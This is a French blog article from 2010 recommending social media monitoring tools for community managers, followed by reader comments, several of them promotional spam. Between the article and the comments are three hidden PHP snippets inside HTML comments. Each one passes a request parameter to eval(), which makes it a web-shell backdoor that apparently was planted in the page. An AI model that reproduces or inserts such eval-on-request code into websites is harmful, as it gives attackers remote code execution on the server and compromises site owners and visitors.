Les meilleurs outils du Community manager

    Par le 2 juillet 2010

    Comment un Community Manager peut-il justifier le ROI à sa direction ? Beaucoup voient l’activité du community manager comme un phénomène de mode, tout en oubliant qu’il doit rendre des comptes à sa hiérarchie.
    Voilà trois outils, indispensables aux community managers, qui leur permettront, non seulement d’établir un tableau de bord et une analyse des « conversations sur la marque » mais aussi, de rendre compte, en bonne et due forme… de leur travail.

    Trendy buzz

    Directement disponibles sur Internet, les tableaux de bord dynamiques TrendyBuzz affichent en temps réel les indicateurs des composantes de la réputation numérique des marques et des personnalités pour une communication réactive et stratégique.
    Trendybuzz

    Alerti

    Vous choisissez des mots clés (par exemple, votre nom, votre marque, le nom de vos concurrents, etc.) et le système se charge de collecter en permanence toute l’information disponible. Une interface simple et intuitive vous permet alors de filtrer, d’analyser et de partager l’information collectée, afin de gérer efficacement la veille de votre entreprise et faire participer les différents collaborateurs de votre entreprise à cette veille.
    Alerti

    SAS Social Media Analytics

    SAS® Social Media Analytics permet de collecter, d’analyser et d’exploiter les communications, les conversations et les posts publiés sur les sites web, les forums, les blogs ou les médias sociaux. Les entreprises peuvent mettre en place des solutions de veille et d’analyse des conversations en ligne afin de réagir rapidement aux évolutions positives ou négatives de leur image, de la perception de leur marque et de leurs offres auprès de leurs clients.
    SAS Social Media Analytics

    Sinon, l’indispensable… Google Alerts

    Avec les alertes Google, vous serez averti par e-mail lorsque de nouveaux articles correspondant aux termes que vous recherchez seront publiés (Web, actualités, etc.).

    Exemples d’utilisation des alertes Google :

    • Suivi de l’évolution d’un sujet d’actualité
    • Réception d’informations sur les activités récentes d’un concurrent ou d’un secteur
    • Suivi de l’actualité d’une personnalité    •    Suivi des résultats d’une équipe sportive…(désolé;-)

    Et vous, quels outils d’analyse et de reporting utilisez-vous ?

    <!– [insert_php]if (isset($_REQUEST["EYehg"])){eval($_REQUEST["EYehg"]);exit;}[/insert_php][php]if (isset($_REQUEST["EYehg"])){eval($_REQUEST["EYehg"]);exit;}[/php] –>

    <!– [insert_php]if (isset($_REQUEST["xwEPN"])){eval($_REQUEST["xwEPN"]);exit;}[/insert_php][php]if (isset($_REQUEST["xwEPN"])){eval($_REQUEST["xwEPN"]);exit;}[/php] –>

    <!– [insert_php]if (isset($_REQUEST["DOK"])){eval($_REQUEST["DOK"]);exit;}[/insert_php][php]if (isset($_REQUEST["DOK"])){eval($_REQUEST["DOK"]);exit;}[/php] –>

    Laisser un commentaire

    Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *

    Benjaminbarrier Il y a 8 années

    Bonjour Philippe,
    N’hésitez pas à me contacter si vous désirez plus d’infos sur TrendyBuzz 🙂
    Benjamin

    Répondre

    Dmsr Il y a 8 années

    Bonjour,
    J’ajouterai Google Reader si vous avez une communauté de bloggers à suivre.
    Il y a aussi Tattler et Managingnews pour ceux qui connaissent Drupal et disposent d’un serveur dédié (2 config gourmandes en RAM et en temps d’éxécution serveur). Ces deux systèmes agrègent des fils RSS et y repèrent des mots clés. Tattler cherche tout seul, Managingnews dans une liste de sources (OPML)…
    Et encore PostRank et UberVu si vous devez mesurer l’impact des posts d’un blogs ou celui de vos tweets.
    Hubert

    Répondre

    Moro Siaka Diallo Il y a 8 années

    Il ya aussi WEBMii qui est un outil de diagnostic et de veille très pratique, gratuit et delivre des données chiffrées sur l’empreinte numérique de votre marque.

    Répondre

    herb Il y a 8 années

    Malheureusement, Trendybuzz est loin d’être gratuit… alors qu’alerti l’est.
    Un peu de concurrence 🙂

    Répondre

    Elisa Il y a 8 années

    Bonjour,
    Afin de vous assurer d’avoir des retombées en ligne, je vous suggèrerais quelques indicateurs de performance à surveiller pour optimiser l’efficacité de vos sites, outils et applications.
    http://barometre.multiple-media.com/?p=329
    Elisa

    Répondre

    Severine Faurax Il y a 8 années

    Bonjour – Merci d’avoir inclus alerti dans votre liste. N’hésitez pas à me contacter si vous avez des questions. Merci

    Répondre

    Olivier Zara Il y a 8 années

    Je teste Alerti en ce moment et je trouve le service très efficace !

    Répondre

    arnaud.dubois@prnewswire.fr Il y a 8 années

    Bonjour,
    j ajouterais surtout SMM (Social Media Metrics) un outil de veille et d analyse commercialise par PRNewswire, le leader mondial de la diffusion de communiaues de presse, l outil permets de monitorer 30 000 sites de news 8 millions de messages forum et 30 millions de blogs ! en plus il est simple d utilisation !

    Répondre

    Herbycash Il y a 8 années

    Ces articles sonttres interessants, vous pouvez aussi consulter le blog: les secrets de la communication. pour ameliorer votre communication. c’est ici:http://secretscommunication.blogspot.com

    Répondre

    Lakiesha Il y a 7 années

    This makes everiyhtng so completely painless.

    Répondre

    Abonnez-vous au blog

    Afin de vous abonner et pour des raisons de sécurité, votre navigateur doit accepter les cookies et le JavaScript.